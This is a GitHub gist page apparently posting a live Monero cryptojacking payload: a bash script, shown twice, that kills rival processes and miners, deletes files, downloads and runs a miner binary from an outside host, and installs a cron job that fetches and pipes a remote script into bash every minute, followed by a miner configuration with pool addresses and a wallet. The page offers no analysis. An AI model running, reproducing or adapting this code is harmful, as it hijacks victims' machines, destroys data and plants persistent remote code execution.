Skip to content

Instantly share code, notes, and snippets.

@5shekel 5shekel/mr.sh
Last active Aug 13, 2019

Embed
What would you like to do?
payload for monero crypto miner
#!/bin/bash
mkdir /var/tmp
chmod 777 /var/tmp
pkill -f getty
netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
pkill -f /usr/bin/.sshd
netstat -antp | grep '158.69.133.20:3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
rm -rf /var/tmp/j*
rm -rf /tmp/j*
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
chmod 777 /var/tmp/sustse
ps aux | grep -vw sustse | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
ps ax | grep /tmp/ | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9
ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9
DIR="/var/tmp"
if [ -a "/var/tmp/sustse" ]
then
if [ -w "/var/tmp/sustse" ] && [ ! -d "/var/tmp/sustse" ]
then
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum /var/tmp/sustse | awk '{ print $1 }')
echo $sum
case $sum in
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
echo "sustse OK"
;;
*)
echo "sustse wrong"
pkill -f wc.conf
pkill -f sustse
sleep 4
;;
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
if [ -d "/var/tmp" ]
then
DIR="/var/tmp"
fi
echo "P NOT EXISTS"
fi
if [ -d "/var/tmp/sustse" ]
then
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget -O";
fi
f2="www.tionhgjk.com:8220"
downloadIfNeed()
{
if [ -x "$(command -v md5sum)" ]
then
if [ ! -f $DIR/sustse ]; then
echo "File not found!"
download
fi
sum=$(md5sum $DIR/sustse | awk '{ print $1 }')
echo $sum
case $sum in
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
echo "sustse OK"
;;
*)
echo "sustse wrong"
sizeBefore=$(du $DIR/sustse)
if [ -s /usr/bin/curl ];
then
WGET="curl -k -o ";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget --no-check-certificate -O ";
fi
#$WGET $DIR/sustse https://transfer.sh/wbl5H/sustse
download
sumAfter=$(md5sum $DIR/sustse | awk '{ print $1 }')
if [ -s /usr/bin/curl ];
then
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustse` > $DIR/var/tmp.txt
fi
;;
esac
else
echo "No md5sum"
download
fi
}
download() {
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/sustse3 | awk '{ print $1 }')
echo $sum
case $sum in
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
echo "sustse OK"
cp $DIR/sustse3 $DIR/sustse
;;
*)
echo "sustse wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}
download2() {
if [ `getconf LONG_BIT` = "64" ]
then
$WGET $DIR/sustse http://www.tionhgjk.com:8220/tte2
fi
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/sustse | awk '{ print $1 }')
echo $sum
case $sum in
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
echo "sustse OK"
cp $DIR/sustse $DIR/sustse3
;;
*)
echo "sustse wrong"
;;
esac
else
echo "No md5sum"
fi
}
judge() {
if [ ! "$(netstat -ant|grep '192.99.142.251\|192.99.142.249\|202.144.193.110'|grep 'ESTABLISHED'|grep -v grep)" ];
then
ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid
do
kill -9 $procid
done
downloadIfNeed
touch /var/tmp/123
pkill -f /var/tmp/java
pkill -f w.conf
chmod +x $DIR/sustse
$WGET $DIR/wc.conf http://$f2/wt.conf
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 &
sleep 5
else
echo "Running"
fi
}
judge2() {
if [ ! "$(ps -fe|grep '/var/tmp/sustse'|grep 'wc.conf'|grep -v grep)" ];
then
downloadIfNeed
chmod +x $DIR/sustse
$WGET $DIR/wc.conf http://$f2/wt.conf
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 &
sleep 5
else
echo "Running"
fi
}
if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
then
judge2
else
judge
fi
if crontab -l | grep -q "www.tionhgjk.com:8220"
then
echo "Cron exists"
else
crontab -r
echo "Cron not found"
LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://www.tionhgjk.com:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
fi
rm -rf /var/tmp/jrm
rm -rf /tmp/jrm
pkill -f 185.222.210.59
pkill -f 95.142.40.81
pkill -f 192.99.142.232
chmod 777 /var/tmp/sustse
crontab -l | sed '/185.222.210.59/d' | crontab -
#!/bin/bash
mkdir /var/tmp
chmod 777 /var/tmp
pkill -f getty
netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
pkill -f /usr/bin/.sshd
netstat -antp | grep '158.69.133.20:3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
rm -rf /var/tmp/j*
rm -rf /tmp/j*
rm -rf /var/tmp/java
rm -rf /tmp/java
rm -rf /var/tmp/java2
rm -rf /tmp/java2
rm -rf /var/tmp/java*
rm -rf /tmp/java*
chmod 777 /var/tmp/sustse
ps aux | grep -vw sustse | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
ps ax | grep /tmp/ | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9
ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'sustse\|sustse\|ppl' | awk '{print $1}' | xargs kill -9
DIR="/var/tmp"
if [ -a "/var/tmp/sustse" ]
then
if [ -w "/var/tmp/sustse" ] && [ ! -d "/var/tmp/sustse" ]
then
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum /var/tmp/sustse | awk '{ print $1 }')
echo $sum
case $sum in
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
echo "sustse OK"
;;
*)
echo "sustse wrong"
pkill -f wc.conf
pkill -f sustse
sleep 4
;;
esac
fi
echo "P OK"
else
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
else
if [ -d "/var/tmp" ]
then
DIR="/var/tmp"
fi
echo "P NOT EXISTS"
fi
if [ -d "/var/tmp/sustse" ]
then
DIR=$(mktemp -d)/var/tmp
mkdir $DIR
echo "T DIR $DIR"
fi
WGET="wget -O"
if [ -s /usr/bin/curl ];
then
WGET="curl -o";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget -O";
fi
f2="www.tionhgjk.com:8220"
downloadIfNeed()
{
if [ -x "$(command -v md5sum)" ]
then
if [ ! -f $DIR/sustse ]; then
echo "File not found!"
download
fi
sum=$(md5sum $DIR/sustse | awk '{ print $1 }')
echo $sum
case $sum in
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
echo "sustse OK"
;;
*)
echo "sustse wrong"
sizeBefore=$(du $DIR/sustse)
if [ -s /usr/bin/curl ];
then
WGET="curl -k -o ";
fi
if [ -s /usr/bin/wget ];
then
WGET="wget --no-check-certificate -O ";
fi
#$WGET $DIR/sustse https://transfer.sh/wbl5H/sustse
download
sumAfter=$(md5sum $DIR/sustse | awk '{ print $1 }')
if [ -s /usr/bin/curl ];
then
echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustse` > $DIR/var/tmp.txt
fi
;;
esac
else
echo "No md5sum"
download
fi
}
download() {
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/sustse3 | awk '{ print $1 }')
echo $sum
case $sum in
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
echo "sustse OK"
cp $DIR/sustse3 $DIR/sustse
;;
*)
echo "sustse wrong"
download2
;;
esac
else
echo "No md5sum"
download2
fi
}
download2() {
if [ `getconf LONG_BIT` = "64" ]
then
$WGET $DIR/sustse http://www.tionhgjk.com:8220/tte2
fi
if [ -x "$(command -v md5sum)" ]
then
sum=$(md5sum $DIR/sustse | awk '{ print $1 }')
echo $sum
case $sum in
042b0568a6e42ed3d4a5520ada926164 | 042b0568a6e42ed3d4a5520ada926164)
echo "sustse OK"
cp $DIR/sustse $DIR/sustse3
;;
*)
echo "sustse wrong"
;;
esac
else
echo "No md5sum"
fi
}
judge() {
if [ ! "$(netstat -ant|grep '192.99.142.251\|192.99.142.249\|202.144.193.110'|grep 'ESTABLISHED'|grep -v grep)" ];
then
ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid
do
kill -9 $procid
done
downloadIfNeed
touch /var/tmp/123
pkill -f /var/tmp/java
pkill -f w.conf
chmod +x $DIR/sustse
$WGET $DIR/wc.conf http://$f2/wt.conf
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 &
sleep 5
else
echo "Running"
fi
}
judge2() {
if [ ! "$(ps -fe|grep '/var/tmp/sustse'|grep 'wc.conf'|grep -v grep)" ];
then
downloadIfNeed
chmod +x $DIR/sustse
$WGET $DIR/wc.conf http://$f2/wt.conf
nohup $DIR/sustse -c $DIR/wc.conf > /dev/null 2>&1 &
sleep 5
else
echo "Running"
fi
}
if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
then
judge2
else
judge
fi
if crontab -l | grep -q "www.tionhgjk.com:8220"
then
echo "Cron exists"
else
crontab -r
echo "Cron not found"
LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://www.tionhgjk.com:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
fi
rm -rf /var/tmp/jrm
rm -rf /tmp/jrm
pkill -f 185.222.210.59
pkill -f 95.142.40.81
pkill -f 192.99.142.232
chmod 777 /var/tmp/sustse
crontab -l | sed '/185.222.210.59/d' | crontab -
{
"algo": "cryptonight",
"api": {
"port": 0,
"access-token": null,
"id": null,
"worker-id": null,
"ipv6": false,
"restricted": true
},
"asm": true,
"autosave": true,
"av": 0,
"background": true,
"colors": true,
"cpu-affinity": null,
"cpu-priority": 5,
"donate-level": 1,
"huge-pages": true,
"hw-aes": null,
"log-file": null,
"max-cpu-usage": 95,
"pools": [
{
"url": "192.99.142.251:80",
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": true,
"variant": -1,
"tls": false,
"tls-fingerprint": null
},
{
"url": "192.99.142.249:3333",
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": true,
"variant": -1,
"tls": false,
"tls-fingerprint": null
},
{
"url": "202.144.193.110:3333",
"user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": true,
"variant": -1,
"tls": false,
"tls-fingerprint": null
}
],
"print-time": 60,
"retries": 5,
"retry-pause": 5,
"safe": false,
"threads": {
"cn": [
{
"low_power_mode": 1,
"affine_to_cpu": false,
"asm": true
},
{
"low_power_mode": 1,
"affine_to_cpu": false,
"asm": true
}
],
"cn-lite": [
{
"low_power_mode": 1,
"affine_to_cpu": false,
"asm": true
},
{
"low_power_mode": 1,
"affine_to_cpu": false,
"asm": true
}
],
"cn-heavy": [
{
"low_power_mode": 1,
"affine_to_cpu": false,
"asm": true
},
{
"low_power_mode": 1,
"affine_to_cpu": false,
"asm": true
}
]
},
"algo-perf": {
"cn": 2.0,
"cn/2": 2.0,
"cn/msr": 2.0,
"cn-lite": 2.0,
"cn-heavy": 2.0
},
"calibrate-algo": false,
"calibrate-algo-time": 10,
"user-agent": null,
"syslog": false,
"watch": false
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.